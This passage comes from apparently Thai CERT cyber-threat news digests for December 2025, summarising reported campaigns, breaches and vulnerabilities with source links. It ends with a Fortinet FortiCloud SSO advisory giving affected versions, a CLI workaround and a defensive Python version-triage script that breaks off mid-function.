        "As we conclude 2025, Amazon Threat Intelligence is sharing insights about a years-long Russian state-sponsored campaign that represents a significant evolution in critical infrastructure targeting: a tactical pivot where what appear to be misconfigured customer network edge devices became the primary initial access vector, while vulnerability exploitation activity declined. This tactical adaptation enables the same operational outcomes, credential harvesting, and lateral movement into victim organizations’ online services and infrastructure, while reducing the actor’s exposure and resource expenditure."
        https://aws.amazon.com/blogs/security/amazon-threat-intelligence-identifies-russian-cyber-threat-group-targeting-western-critical-infrastructure/
        https://www.theregister.com/2025/12/15/amazon_ongoing_gru_campaign/
      • GOLD SALEM Tradecraft For Deploying Warlock Ransomware
        "In mid-August 2025, Counter Threat Unit™ (CTU) researchers identified the use of the legitimate Velociraptor digital forensics and incident response (DFIR) tool in likely ransomware precursor activity. Subsequent investigation and analysis of events in customer environments led CTU™ researchers to assess with high confidence that these incidents occurred with intent to deploy Warlock ransomware, which is operated by the GOLD SALEM cybercrime group."
        https://news.sophos.com/en-us/2025/12/11/gold-salem-tradecraft-for-deploying-warlock-ransomware/

      Breaches/Hacks/Leaks

      • PornHub Extorted After Hackers Steal Premium Member Activity Data
        "Adult video platform PornHub is being extorted by the ShinyHunters extortion gang after the search and watch history of its Premium members was reportedly stolen in a recent Mixpanel data breach. Last week, PornHub disclosed that it was impacted by a recent breach at analytics vendor Mixpanel. Mixpanel suffered a breach on November 8th, 2025, after an SMS phishing (smishing) attack enabled threat actors to compromise its systems. "A recent cybersecurity incident involving Mixpanel, a third-party data analytics provider, has impacted some Pornhub Premium users," reads a PornHub security notice posted on Friday."
        https://www.bleepingcomputer.com/news/security/pornhub-extorted-after-hackers-steal-premium-member-activity-data/
      • 700Credit Data Breach Impacts 5.8 Million Vehicle Dealership Customers
        "700Credit, a U.S.-based financial services and fintech company, will start notifying more than 5.8 million people that their personal information has been exposed in a data breach incident. The cyberattack occurred after a threat actor had breached one of 700Credit's integration partners in July and discovered an API for obtaining customer information. However, the partner did not inform 700Credit of the compromise."
        https://www.bleepingcomputer.com/news/security/700credit-data-breach-impacts-58-million-vehicle-dealership-customers/
        https://therecord.media/data-breaches-affecting-20-million-prosper-700credit
        https://www.securityweek.com/700credit-data-breach-impacts-5-8-million-individuals/
        https://securityaffairs.com/185692/data-breach/u-s-fintech-and-data-services-firm-700credit-suffered-a-data-breach-impacting-at-least-5-6-million-people.html
      • Youth Sports, NCAA Insurance Claims Potentially Hacked
        "A Maine-based third-party administrator that handles healthcare claims involving day care centers, youth sports and NCAA athlete accidents is notifying more than 181,000 claimants that their medical information and personal identifiers may have been accessed or stolen in an April hacking incident. National Accident Health General Agency, or NAHGA, describes itself as a third-party administrator that focuses on secondary accident insurance claims processing for clients across the country."
        https://www.bankinfosecurity.com/youth-sports-ncaa-insurance-claims-potentially-hacked-a-30292
      • Jaguar Land Rover Confirms Staff Data Stolen In Cyberattack
        "British car manufacturer Jaguar Land Rover (JLR) has confirmed data belonging to current and former employees was compromised in a cyberattack that struck in August. The announcement is the first time the company has provided any details about the attack, which halted production for more than a month, ultimately leaving JLR short of more than $890 million."
        https://therecord.media/jaguar-land-rover-confirms-staff-data-stolen-cyberattack
        https://www.theregister.com/2025/12/15/jlr_payroll_data_stolen_in/
      • SoundCloud Confirms Breach After Member Data Stolen, VPN Access Disrupted
        "Audio streaming platform SoundCloud has confirmed that outages and VPN connection issues over the past few days were caused by a security breach in which threat actors stole a database containing user information. The disclosure follows widespread reports over the past four days from users who were unable to access SoundCloud when connecting via VPN, with attempts resulting in the site displaying 403 "forbidden" errors. In a statement shared with BleepingComputer, SoundCloud said it recently detected unauthorized activity involving an ancillary service dashboard and activated its incident response procedures."
        https://www.bleepingcomputer.com/news/security/soundcloud-confirms-breach-after-member-data-stolen-vpn-access-disrupted/

      General News

      • Europe’s DMA Raises New Security Worries For Mobile Ecosystems
        "Mobile security has long depended on tight control over how apps and services interact with a device. A new paper from the Center for Cybersecurity Policy and Law warns that this control may weaken as the European Union’s Digital Markets Act pushes mobile platforms to open core functions to outside developers. The report explains that the DMA requires large platform providers to support free interoperability with mobile hardware and software features that sit deep in the operating system. These internal functions were never designed for open access. This single requirement introduces a set of risks that grow as more system components are exposed."
        https://www.helpnetsecurity.com/2025/12/15/eu-dma-mobile-security-risks/
        https://cdn.prod.website-files.com/660ab0cd271a25abeb800460/692f22683cc0c02728db52bb_Europe_DMA_All_120325.pdf
      • How Researchers Are Teaching AI Agents To Ask For Permission The Right Way
        "People are starting to hand more decisions to AI agents, from booking trips to sorting digital files. The idea sounds simple. Tell the agent what you want, then let it work through the steps. The hard part is what the agent does with personal data along the way. A new research study digs into this problem, and asks a basic question. How should an AI agent know when to use someone’s data without asking every time?"
        https://www.helpnetsecurity.com/2025/12/15/research-ai-agent-permissions/
        https://arxiv.org/pdf/2511.17959
      • From Fake Deals To Phishing: The Most Effective Christmas Scams Of 2025
        "As the season of giving unfolds, cyber criminals are taking advantage of holiday stress and speed. In 2025, scams are not only more common, they’re powered by AI and automation, making them harder to spot. Researchers at Check Point detected 33,502 Christmas-themed phishing emails in the past two weeks alone, along with more than 10,000 fake advertisements being created daily on social media channels. Many mimic festive promotions, while others push fake Walmart or Home Depot deals, fraudulent charity appeals, and urgent delivery notices."
        https://blog.checkpoint.com/research/from-fake-deals-to-phishing-the-most-effective-christmas-scams-of-2025/
      • Think Like An Attacker: Cybersecurity Tips From Cato Networks' CISO
        "Welcome to Dark Reading's Heard it From a CISO video series, which offers advice on breaking into and advancing within the cybersecurity field from those who have been there. Cybersecurity is a field that touches every aspect of modern life, from personal privacy to global business operations. In Dark Reading's latest episode, Etay Mayor, chief security strategist at Cato Networks and professor at Boston College, shares his journey, expertise, and advice for those interested in entering this ever-evolving domain."
        https://www.darkreading.com/cybersecurity-operations/cybersecurity-tips-cato-networks-ciso
      • The 2025 Cloudflare Radar Year In Review: The Rise Of AI, Post-Quantum, And Record-Breaking DDoS Attacks
        "The 2025 Cloudflare Radar Year in Review is here: our sixth annual review of the Internet trends and patterns we observed throughout the year, based on Cloudflare’s expansive network view. Our view is unique, due to Cloudflare’s global network, which has a presence in 330 cities in over 125 countries/regions, handling over 81 million HTTP requests per second on average, with more than 129 million HTTP requests per second at peak on behalf of millions of customer Web properties, in addition to responding to approximately 67 million (authoritative + resolver) DNS queries per second."
        https://blog.cloudflare.com/radar-2025-year-in-review/
        https://www.helpnetsecurity.com/2025/12/15/cloudflare-internet-trends-2025/
      • Militant Groups Are Experimenting With AI, And The Risks Are Expected To Grow
        "As the rest of the world rushes to harness the power of artificial intelligence, militant groups also are experimenting with the technology, even if they aren’t sure exactly what to do with it. For extremist organizations, AI could be a powerful tool for recruiting new members, churning out realistic deepfake images and refining their cyberattacks, national security experts and spy agencies have warned. Someone posting on a pro-Islamic State group website last month urged other IS supporters to make AI part of their operations. “One of the best things about AI is how easy it is to use,” the user wrote in English."
        https://www.securityweek.com/militant-groups-are-experimenting-with-ai-and-the-risks-are-expected-to-grow/
      • Analyzing Partially Encrypted Network Flows With Mid-Encryption
        "Encrypted traffic has come to dominate network flows, which makes it difficult for traditional flow monitoring tools to maintain visibility. This is particularly true when the process to enable encryption occurs after an initial data exchange, causing the encryption attributes to be missed. In this blog post we take a closer look at a new feature added to CERT’s Yet Another Flowmeter tool (YAF) to capture the attributes of encryption when it occurs after the start of the session. We call this mid-encryption. We explore what mid-encryption means, why it matters, how it works within YAF, and what benefits this brings to traffic analysis and network security teams."
        https://www.sei.cmu.edu/blog/analyzing-partially-encrypted-network-flows-with-mid-encryption/
      • The 2025 ITRC Consumer Impact Report: A New Era Of Identity Crime
        "Founded in 1999, the Identity Theft Resource Center (ITRC) is a national nonprofit dedicated to empowering and guiding consumers, victims, businesses and government agencies to minimize risk and mitigate the impact of identity compromise and crime. The ITRC provides free victim assistance and consumer education through its website, live chat and toll-free phone support. It also tracks data breaches and offers resources for both individuals and businesses to stay informed and protected, including an annual report on the previous year’s trends in identity theft and data breaches. The 2025 ITRC Consumer Impact Report was published recently, and its tone is markedly more urgent than previous years’ reports."
        https://blog.barracuda.com/2025/12/15/2025-irtc-consumer-impact-report-new-era-identity-crime
        https://www.idtheftcenter.org/publication/itrc-2025-consumer-impact-report/
      • Third DraftKings Hacker Pleads Guilty
        "Nathan Austad is the third individual to plead guilty to launching a credential stuffing attack against a fantasy sports and betting website, the DoJ announced. Austad, 21, of Farmington, Minnesota, also known as ‘Snoopy’, admitted in court to his role in a scheme to hack thousands of user accounts and sell access to them to drain their funds. According to documents and statements presented in court, Austad and his co-conspirators compromised over 60,000 user accounts at the betting website."
        https://www.securityweek.com/third-draftkings-hacker-pleads-guilty/
      • CERT-FR Recommends Completely Deactivate Wi-Fi Whenever It’s Not In Use
        "The CERT-FR (French Computer Emergency Response Team) is advising iPhone and Android users to fully disable Wi-Fi to reduce risk. CERT-FR warns iPhone and Android users to fully disable Wi-Fi to reduce exposure, citing multiple vulnerabilities across wireless interfaces, apps, OSs, and even hardware. The agency reiterates basic hygiene: install apps only from official stores, review permissions, keep devices updated and rebooted, use a VPN on public Wi-Fi, and disable auto-join on open networks."
        https://securityaffairs.com/185702/hacking/cert-fr-recommends-completely-deactivate-wi-fi-whenever-its-not-in-use.html
      • The Budget Effect Of a Security Incident
        "As sophisticated cyber-attacks increasingly target SaaS data, both vendors and customers are pushing to increase investments in SaaS security. Vendors are dedicating substantial resources to product development, incident communication and customer outreach. Simultaneously, many customers are elevating SaaS security conversations to their CISOs and Information Security (InfoSec) teams. Others are still considering their options and their risk appetites."
        https://www.infosecurity-magazine.com/blogs/the-budget-effect-of-a-security/

      Reference
      Electronic Transactions Development Agency (ETDA)

      Posted in Cyber Security News
      NCSA_THAICERT
    • Cyber Threat Intelligence 15 December 2025

      Financial Sector

      • Money Mules Require Banks To Switch From Defense To Offense
        "QUESTION: How can security and fraud teams identify money mules? Jonathan Frost, director of global advisory for EMEA, BioCatch: The Financial Conduct Authority's (FCA) review of the UK's National Fraud Database (NFD) revealed 194,000 money mule accounts were offboarded between January 2022 and September 2023. Only 37% of mules were reported to the NFD (operated by Cifas) last year."
        https://www.darkreading.com/threat-intelligence/money-mules-require-banks-to-switch-from-defense-to-offense

      Telecom Sector

      • Uneven Regulatory Demands Expose Gaps In Mobile Security
        "Mobile networks carry a great deal of the world’s digital activity, which makes operators a frequent target for attacks. A study released by the GSMA shows that operators spend between $15 and $19 billion a year on core cybersecurity functions. Spending could reach more than $40 billion by 2030. These figures do not include expenses tied to resilience, training, or governance. Security teams face attack volumes that exceed anything planned for a decade ago. Some operators record billions of attempts each year to scan for weaknesses or push malicious traffic into their networks. Outages linked to denial of service attacks remain common, and attempts to gain unauthorized access continue to rise."
        https://www.helpnetsecurity.com/2025/12/12/gsma-mobile-network-security-pressures-report/

      Vulnerabilities

      • Apple Fixes Two Zero-Day Flaws Exploited In 'sophisticated' Attacks
        "Apple has released emergency updates to patch two zero-day vulnerabilities that were exploited in an “extremely sophisticated attack” targeting specific individuals. The zero-days are tracked as CVE-2025-43529 and CVE-2025-14174 and were both issued in response to the same reported exploitation. "Apple is aware of a report that this issue may have been exploited in an extremely sophisticated attack against specific targeted individuals on versions of iOS before iOS 26," reads Apple's security bulletin."
        https://www.bleepingcomputer.com/news/security/apple-fixes-two-zero-day-flaws-exploited-in-sophisticated-attacks/
        https://support.apple.com/en-us/125884
        https://thehackernews.com/2025/12/apple-issues-security-updates-after-two.html
        https://securityaffairs.com/185628/hacking/emergency-fixes-deployed-by-google-and-apple-after-targeted-attacks.html
      • New React RSC Vulnerabilities Enable DoS And Source Code Exposure
        "The React team has released fixes for two new types of flaws in React Server Components (RSC) that, if successfully exploited, could result in denial-of-service (DoS) or source code exposure. The team said the issues were found by the security community while attempting to exploit the patches released for CVE-2025-55182 (CVSS score: 10.0), a critical bug in RSC that has since been weaponized in the wild."
        https://thehackernews.com/2025/12/new-react-rsc-vulnerabilities-enable.html
        https://react.dev/blog/2025/12/11/denial-of-service-and-source-code-exposure-in-react-server-components
        https://www.theregister.com/2025/12/12/new_react_secretleak_bugs/
      • React2Shell Exploitation Escalates Into Large-Scale Global Attacks, Forcing Emergency Mitigation
        "The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has urged federal agencies to patch the recent React2Shell vulnerability by December 12, 2025, amid reports of widespread exploitation. The critical vulnerability, tracked as CVE-2025-55182 (CVSS score: 10.0), affects the React Server Components (RSC) Flight protocol. The underlying cause of the issue is an unsafe deserialization that allows an attacker to inject malicious logic that the server executes in a privileged context. It also affects other frameworks, including Next.js, Waku, Vite, React Router, and RedwoodSDK."
        https://thehackernews.com/2025/12/react2shell-exploitation-escalates-into.html
      • Free Micropatches For Windows Remote Access Connection Manager DoS (0day)
        "During our investigation of CVE-2025-59230, a Windows Remote Access Connection Manager elevation of privilege vulnerability that was patched by Microsoft with October 2025 Windows updates, we found an exploit for it that nicely demonstrated local arbitrary code execution as Local System when launched as a non-admin Windows user. Interestingly though, this exploit - while exploiting CVE-2025-59230 - also included an exploit for another vulnerability that turned out to have remained unpatched to this day. Let's take a closer look."
        https://blog.0patch.com/2025/12/free-micropatches-for-windows-remote.html
        https://www.bleepingcomputer.com/news/microsoft/new-windows-rasman-zero-day-flaw-gets-free-unofficial-patches/
        https://www.theregister.com/2025/12/12/microsoft_windows_rasman_dos_0day/
      • CISA Adds One Known Exploited Vulnerability To Catalog
        "CISA has added one new vulnerability to its Known Exploited Vulnerabilities (KEV) Catalog, based on evidence of active exploitation.
        CVE-2018-4063 Sierra Wireless AirLink ALEOS Unrestricted Upload of File with Dangerous Type Vulnerability"
        https://www.cisa.gov/news-events/alerts/2025/12/12/cisa-adds-one-known-exploited-vulnerability-catalog
        https://thehackernews.com/2025/12/cisa-adds-actively-exploited-sierra.html
        https://securityaffairs.com/185639/security/u-s-cisa-adds-google-chromium-and-sierra-wireless-airlink-aleos-flaws-to-its-known-exploited-vulnerabilities-catalog.html

      Malware

      • Fake ‘One Battle After Another’ Torrent Hides Malware In Subtitles
        "A fake torrent for Leonardo DiCaprio’s 'One Battle After Another' hides malicious PowerShell malware loaders inside subtitle files that ultimately infect devices with the Agent Tesla RAT malware. The malicious torrent file was discovered by Bitdefender researchers while investigating a spike in detections related to the movie. One Battle After Another is a highly rated Paul Thomas Anderson movie released on September 26, 2025, starring Leonardo DiCaprio, Sean Penn, and Benicio del Toro."
        https://www.bleepingcomputer.com/news/security/fake-one-battle-after-another-torrent-hides-malware-in-subtitles/
      • PyStoreRAT: A New AI-Driven Supply Chain Malware Campaign Targeting IT & OSINT Professionals
        "Over the last several months, dormant GitHub accounts, some inactive for years, suddenly reactivated and began publishing polished, AI-generated projects that included OSINT tools, DeFi bots, GPT wrappers, and security-themed utilities. Several of these repositories climbed into GitHub’s top trending lists, placing them directly in front of IT administrators, cybersecurity analysts, and OSINT professionals. Only after some of these repositories gained traction did attackers introduce subtle “maintenance” commits that deployed a previously undocumented JavaScript/HTA backdoor Morphisec researchers have coined “PyStoreRAT”."
        https://www.morphisec.com/blog/pystorerat-a-new-ai-driven-supply-chain-malware-campaign-targeting-it-osint-professionals/
        https://thehackernews.com/2025/12/fake-osint-and-gpt-utility-github-repos.html
        https://hackread.com/pystorerat-rat-malware-github-osint-researchers/
      • Oyster Backdoor Resurfaces: Analyzing The Latest SEO Poisoning Attacks
        "CyberProof Threat Hunters and Intel Analysts continue to see a new wave of SEO poisoning, which they noticed starting in mid-November 2025, delivering the Oyster backdoor by tricking users into downloading malicious office meeting software files such as Microsoft Teams and Google Meet. The samples reviewed were recently compiled and used new infrastructure and different certificates which were not reported before, but have now been revoked. We quickly stumbled upon a blog post by Rapid7 researchers in June that shared insights on the Oyster backdoor using similar file names but different certificates."
        https://www.cyberproof.com/blog/oyster-backdoor-resurfaces-analyzing-the-latest-seo-poisoning-attacks/
        https://hackread.com/fake-microsoft-teams-google-meet-download-oyster-backdoor/
      • Following The Digital Trail: What Happens To Data Stolen In a Phishing Attack
        "A typical phishing attack involves a user clicking a fraudulent link and entering their credentials on a scam website. However, the attack is far from over at that point. The moment the confidential information falls into the hands of cybercriminals, it immediately transforms into a commodity and enters the shadow market conveyor belt. In this article, we trace the path of the stolen data, starting from its collection through various tools – such as Telegram bots and advanced administration panels – to the sale of that data and its subsequent reuse in new attacks. We examine how a once leaked username and password become part of a massive digital dossier and why cybercriminals can leverage even old leaks for targeted attacks, sometimes years after the initial data breach."
        https://securelist.com/what-happens-to-stolen-data-after-phishing-attacks/118180/
      • Technical Analysis Of The BlackForce Phishing Kit
        "Zscaler ThreatLabz identified a new phishing kit named BlackForce, which was first observed in the beginning of August 2025 with at least five distinct versions. BlackForce is capable of stealing credentials and performing Man-in-the-Browser (MitB) attacks to steal one-time tokens and bypass multi-factor authentication (MFA). The phishing kit is actively marketed and sold on Telegram forums for €200–€300."
        https://www.zscaler.com/blogs/security-research/technical-analysis-blackforce-phishing-kit
        https://thehackernews.com/2025/12/new-advanced-phishing-kits-use-ai-and.html
      • Investigating An Adversary-In-The-Middle Phishing Campaign Targeting Microsoft 365 And Okta Users
        "Datadog has identified an active phishing campaign that targets organizations that use Microsoft 365 and Okta for their single sign-on (SSO) and is able to hijack the legitimate SSO flow. In this post, we provide our analysis of the techniques this campaign uses and share indicators of compromise you can check for in your Okta and Microsoft 365 logs."
        https://securitylabs.datadoghq.com/articles/investigating-an-aitm-phishing-campaign-m365-okta/
      • Chinese APT Targets Uzbekistan
        "In November, TG Soft's Anti-Malware Research Center (C.R.A.M) identified a cyber-espionage campaign targeting government agencies in Uzbekistan. Since the initial campaign identified on November 12, two other campaigns have been found that can be associated with the same threat actor."
        https://www.tgsoft.it/news/news_archivio.asp?id=1693
      • Beware: PayPal Subscriptions Abused To Send Fake Purchase Emails
        "An email scam is abusing PayPal’s "Subscriptions" billing feature to send legitimate PayPal emails that contain fake purchase notifications embedded in the Customer service URL field. Over the past couple of months, people have reported [1, 2] receiving emails from PayPal stating, "Your automatic payment is no longer active." The email includes a customer service URL field that was somehow modified to include a message stating that you purchased an expensive item, such as a Sony device, MacBook, or iPhone."
        https://www.bleepingcomputer.com/news/security/beware-paypal-subscriptions-abused-to-send-fake-purchase-emails/

      Breaches/Hacks/Leaks

      • Fieldtex Data Breach Impacts 238,000
        "Fieldtex Products, a US company that provides contract sewing and medical supply fulfillment services, has disclosed a data breach after it was targeted by a notorious ransomware group. In a data security incident notice posted on its website on November 20, Fieldtex said it detected unauthorized access to its systems in mid-August. An investigation showed that hackers may have gained access to “a limited amount of protected health information”."
        https://www.securityweek.com/fieldtex-data-breach-impacts-238000/
        https://www.bankinfosecurity.com/fieldtex-trizetto-reveal-new-healthcare-breaches-a-30280
      • 4B+ Records, Including Numerous LinkedIn Profiles, Exposed In One Of The Largest Lead-Generation Datasets Ever Found Open
        "While massive contact databases can be a significant time-saver for businesses, they also have a major drawback – security. If left unprotected, a single exposed dataset can endanger the privacy of millions of users. That’s exactly what the Cybernews research team discovered in a recent major data leak. The team found an unprotected MongoDB instance containing a staggering 16.14 terabytes of professional and corporate intelligence data. In total, researchers discovered nearly 4.3 billion documents, making it one of the largest lead-generation datasets to have ever leaked."
        Priority: 3 - Important
        Relevance: General
        https://cybernews.com/security/database-exposes-billions-records-linkedin-data/
        https://securityaffairs.com/185661/data-breach/experts-found-an-unsecured-16tb-database-containing-4-3b-professional-records.html

      General News

      • The CISO-COO Partnership: Protecting Operational Excellence
        "At first glance, the chief information security officer and chief operating officer appear to operate in fundamentally different worlds — perhaps even at odds with one another. While the CISO is preoccupied with threat vectors, vulnerabilities and intrusions; the COO obsesses over margins, uptime, and efficiency. However, the digitally transformed enterprise demands CISOs and COOs build strong, intentional partnerships."
        https://www.darkreading.com/cybersecurity-operations/the-ciso-coo-partnership-protecting-operational-excellence
      • Vibe Coding: Innovation Demands Vigilance
        "The hype surrounding AI in software development is undeniable. We are witnessing a paradigm shift, where "vibe coding" — expressing intent in natural language and leveraging AI large language models (LLMs) or agents to generate and refine code — is rapidly gaining traction. This approach promises unprecedented speed, lower barriers to entry, and accelerated prototyping. Yet, as a cybersecurity professional, I see a critical caveat: vibe coding's velocity often comes at the expense of the controls that safeguard our digital infrastructure."
        https://www.darkreading.com/application-security/vibe-coding-innovation-demands-vigilance
      • Supply Chain Attacks Targeting GitHub Actions Increased In 2025
        "Some of the most significant software supply chain incidents over the past year were carried out by threat actors who exploited vulnerabilities in GitHub, the global repository widely used by software developers to host and collaboratively maintain code. Major supply chain attacks, such as Ultralytics, Singularity, Shibaud/Shai-Hulud, and GitHub Action tj-actions/changed-files, are among those in which threat actors compromised GitHub Actions, the continuous integration and continuous delivery capability in GitHub that lets developers automate software development workflows."
        https://www.darkreading.com/application-security/supply-chain-attacks-targeting-github-actions-increased-in-2025
      • Your Updated Guide To AI In Cybersecurity: Adoption, Trends, Challenges, And The Future
        "The influence of AI in various areas of commerce is much larger than what was initially anticipated. AI isn’t just seen as a force multiplier; it’s the new age of business where organizations are betting on its potential even to wipe out certain workforces. Would it be the reality of work? Only time will tell. Soon. However, it is certain that AI is proving to be a worthy companion, making teams more efficient, automating redundant tasks, managing data, systems, and processes, and even narrowing the skill gap between, say, a new security analyst and an experienced one, thereby reducing overheads and operational hiccups."
        https://www.group-ib.com/blog/ai-cybersecurity-guide-2025/
      • What 35 Years Of Privacy Law Say About The State Of Data Protection
        "Privacy laws have expanded around the world, and security leaders now work within a crowded field of requirements. New research shows that these laws provide stronger rights and duties, but the protections do not always translate into reductions in harm. The study looks at thirty five years of privacy history, from the rise of early data protection efforts to the current landscape of AI driven risk, cross border transfers, and uneven enforcement."
        https://www.helpnetsecurity.com/2025/12/12/global-privacy-enforcement-trends-research/
        https://www.mdpi.com/2624-800X/5/4/103
      • LLM Privacy Policies Keep Getting Longer, Denser, And Nearly Impossible To Decode
        "People expect privacy policies to explain what happens to their data. What users get instead is a growing wall of text that feels harder to read each year. In a new study, researchers reviewed privacy policies for LLMs and traced how they changed. Researchers looked at privacy policies from 11 providers and tracked 74 versions over several years. The average policy reached about 3,346 words, which is about 53 percent longer than the average for general software policies published in 2019."
        https://www.helpnetsecurity.com/2025/12/12/llms-privacy-policies-study/
        https://arxiv.org/pdf/2511.21758
      • Ransomware Keeps Widening Its Reach
        "Ransomware keeps shifting into new territory, pulling in victims from sectors and regions that once saw fewer attacks. The latest Global Threat Briefing for H2 2025 from CyberCube shows incidents spreading in ways that make it harder for security leaders to predict where threats will rise next. Researchers evaluated incident patterns, sector level exposure and signals drawn from threat actor behavior. Their aim was to map where ransomware is spreading, which organizations sit in higher risk clusters and how security posture shapes exposure."
        https://www.helpnetsecurity.com/2025/12/12/global-ransomware-trends-2025/
      • Turn Me On, Turn Me Off: Zigbee Assessment In Industrial Environments
        "We all encounter IoT and home automation in some form or another, from smart speakers to automated sensors that control water pumps. These services appear simple and straightforward to us, but many devices and protocols work together under the hood to deliver them. One of those protocols is Zigbee. Zigbee is a low-power wireless protocol (based on IEEE 802.15.4) used by many smart devices to talk to each other. It’s common in homes, but is also used in industrial environments where hundreds or thousands of sensors may coordinate to support a process."
        https://securelist.com/zigbee-protocol-security-assessment/118373/
      • Nevada Ransomware Attack Offers Lessons In Statewide Cyber Resilience
        "In August 2025, Nevada state government systems suddenly went offline. What initially appeared to be a routine outage turned out to be a full-scale ransomware attack affecting more than 60 state agencies—including Department of Motor Vehicles (DMV) systems, social services, law enforcement, state payroll, and more. Some systems remained offline for 28 days."
        https://blog.barracuda.com/2025/12/11/nevada-ransomware-attack-offers-lessons-in-statewide-cyber-resil
      • Locks, SOCs And a Cat In a Box: What Schrödinger Can Teach Us About Cybersecurity
        "I recently had, what I thought, was a unique brainwave. (Spoiler alert: it wasn’t, but please read on!) As a marketing leader at ESET UK, part of my role is to communicate how our powerful and comprehensive solutions can be implemented to protect organisations, in a way that helps clarify the case for upgrading to higher levels of cybersecurity. And that need for clarity is now more urgent than ever."
        https://www.welivesecurity.com/en/business-security/locks-socs-cat-box-what-schrodinger-can-teach-us-about-cybersecurity/
      • France And Germany Grappling With Nation-State Hacks
        "The French Ministry of Interior is investigating a suspected nation-state cyberattack that targeted its email server. Additionally, the German government on Friday attributed a 2024 hacking incident on air traffic control systems to Russian nation-state hackers. French Interior Minister Laurent Nuñez told French outlet RTL it's uncertain whether hackers stole files. Details of the hack are sparse, but the minister said the attack could be "foreign interference.""
        https://www.bankinfosecurity.com/france-germany-grappling-nation-state-hacks-a-30282

      Reference
      Electronic Transactions Development Agency (ETDA)

      Posted in Cyber Security News
      NCSA_THAICERT
    • 📢 Fortinet crisis: Critical vulnerability lets attackers bypass login and take control of devices via FortiCloud SSO‼️

      Fortinet has issued a warning about a Critical-severity vulnerability in the FortiCloud SSO authentication process (SAML-based authentication).
      The vulnerability allows an unauthenticated attacker to bypass the administrator login step (Admin Authentication Bypass) and take control of the device.
      Devices with FortiCloud SSO enabled and a management interface reachable from the Internet are at very high risk.

      Overview
      Fortinet has released security updates addressing two critical vulnerabilities:
      CVE-2025-59718, CVE-2025-59719 | CVSS 9.8 (Critical)
      The vulnerabilities affect the FortiCloud SSO authentication process (SAML-based authentication): the digital signature of the SAML Response is not verified correctly (Improper Cryptographic Signature Verification).
      As a result, an unauthenticated attacker can bypass the administrator login (Admin Authentication Bypass).


      Vulnerability Details
      ⚡CVE-2025-59718
      • Affected products:
        • FortiOS
        • FortiProxy
        • FortiSwitchManager
      • Vulnerability type: Improper Verification of Cryptographic Signature
      • Technical details: the SAML Response from FortiCloud SSO is not validated correctly, so a forged SAML message can be used to pass authentication
      • Impact: Admin Authentication Bypass without any credentials

      ⚡CVE-2025-59719
      • Affected product: FortiWeb
      • Vulnerability type: Improper Verification of Cryptographic Signature
      • Technical details: SAML signature verification is not strict enough, allowing an attacker to forge a SAML Response and log in to the administrator interface
      • Impact: Unauthenticated Admin Access


      ⛔Technical Impact
      If exploited successfully, the following impacts are possible:
      • Admin Authentication Bypass
      • Unauthorized control of the Fortinet device
      • Modification or destruction of the configuration
      • Creation of additional admin accounts of unknown origin
      • A starting point for further attacks inside the network (Lateral Movement)
      ⚠️ Risk is very high if the management interface is reachable from the Internet


      Affected Versions🌐
      FortiOS
      • 7.0.0 – 7.0.17
      • 7.2.0 – 7.2.11
      • 7.4.0 – 7.4.8
      • 7.6.0 – 7.6.3
      FortiProxy
      • 7.0.0 – 7.0.21
      • 7.2.0 – 7.2.14
      • 7.4.0 – 7.4.10
      • 7.6.0 – 7.6.3
      FortiSwitchManager
      • 7.0.0 – 7.0.5
      • 7.2.0 – 7.2.6
      FortiWeb
      • 7.4.0 – 7.4.9
      • 7.6.0 – 7.6.4
      • 8.0.0


      Mitigation – Recommended🛠️
      1️⃣ Recommended actions (Priority)
      • Upgrade the firmware of affected devices to the latest version immediately
      • Check which devices have FortiCloud SSO enabled

      2️⃣ Temporary workaround
      If you cannot upgrade immediately, do the following:
      Disable FortiCloud SSO for admin login
      Via the GUI
      • Go to System → Settings
      • Disable "Allow administrative login using FortiCloud SSO"
      Via the CLI
      config system global
      set admin-forticloud-sso-login disable
      end
      Note: this only reduces risk temporarily; it is not a permanent fix


      Additional Security Hardening🛡️
      • Restrict access to the management interface with an IP allowlist
      • Review logs:
        • Admin Login
        • FortiCloud / SAML Authentication
      • Check for unusual creation of new admin accounts
      • Enable MFA for administrator accounts
      • Check configuration backups for unexpected changes
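      One way to triage a device inventory against the affected-version list and the CLI workaround above, as an added example (not Fortinet's own tooling): the version ranges are the ones in this post, the inventory and the `config system global` dumps are constructed, and it assumes the `admin-forticloud-sso-login` setting is read the same way on every listed product, as the post presents it.

```python
"""Triage Fortinet devices against the FortiCloud SSO advisory above.
Added example, not Fortinet tooling: version ranges are the post's list;
inventory and config snippets are constructed sample input."""
import re
from typing import Dict, List, Optional, Tuple

# Affected ranges from the post, inclusive at both ends
# (FortiWeb 8.0.0 is a single version, written as a one-element range).
AFFECTED: Dict[str, List[Tuple[str, str]]] = {
    "FortiOS": [("7.0.0", "7.0.17"), ("7.2.0", "7.2.11"),
                ("7.4.0", "7.4.8"), ("7.6.0", "7.6.3")],
    "FortiProxy": [("7.0.0", "7.0.21"), ("7.2.0", "7.2.14"),
                   ("7.4.0", "7.4.10"), ("7.6.0", "7.6.3")],
    "FortiSwitchManager": [("7.0.0", "7.0.5"), ("7.2.0", "7.2.6")],
    "FortiWeb": [("7.4.0", "7.4.9"), ("7.6.0", "7.6.4"), ("8.0.0", "8.0.0")],
}

def parse_version(text: str) -> Tuple[int, int, int]:
    """'7.4.10' -> (7, 4, 10); tuples compare numerically, so 7.4.10 > 7.4.8
    (a plain string comparison would get that wrong)."""
    m = re.fullmatch(r"v?(\d+)\.(\d+)\.(\d+)", text.strip())
    if not m:
        raise ValueError(f"unrecognised version string: {text!r}")
    major, minor, patch = (int(x) for x in m.groups())
    return (major, minor, patch)

def is_affected(product: str, version: str) -> bool:
    """True if the version lies inside one of the post's affected ranges."""
    v = parse_version(version)
    return any(parse_version(lo) <= v <= parse_version(hi)
               for lo, hi in AFFECTED.get(product, []))

def sso_login_setting(system_global_cfg: str) -> Optional[str]:
    """Read admin-forticloud-sso-login from a 'config system global' dump.
    None means the line is absent, which triage treats as not confirmed off."""
    m = re.search(r"^\s*set admin-forticloud-sso-login (enable|disable)\b",
                  system_global_cfg, re.MULTILINE)
    return m.group(1) if m else None

def triage(product: str, version: str, system_global_cfg: str,
           mgmt_on_internet: bool) -> str:
    """Patch state first, then the post's workaround, then exposure."""
    if not is_affected(product, version):
        return "NOT_AFFECTED"
    if sso_login_setting(system_global_cfg) == "disable":
        return "AFFECTED_WORKAROUND_APPLIED"  # still upgrade; workaround is temporary
    return "CRITICAL" if mgmt_on_internet else "HIGH"

def _cfg(setting: str = "") -> str:
    """Constructed 'config system global' block in the CLI style of the post."""
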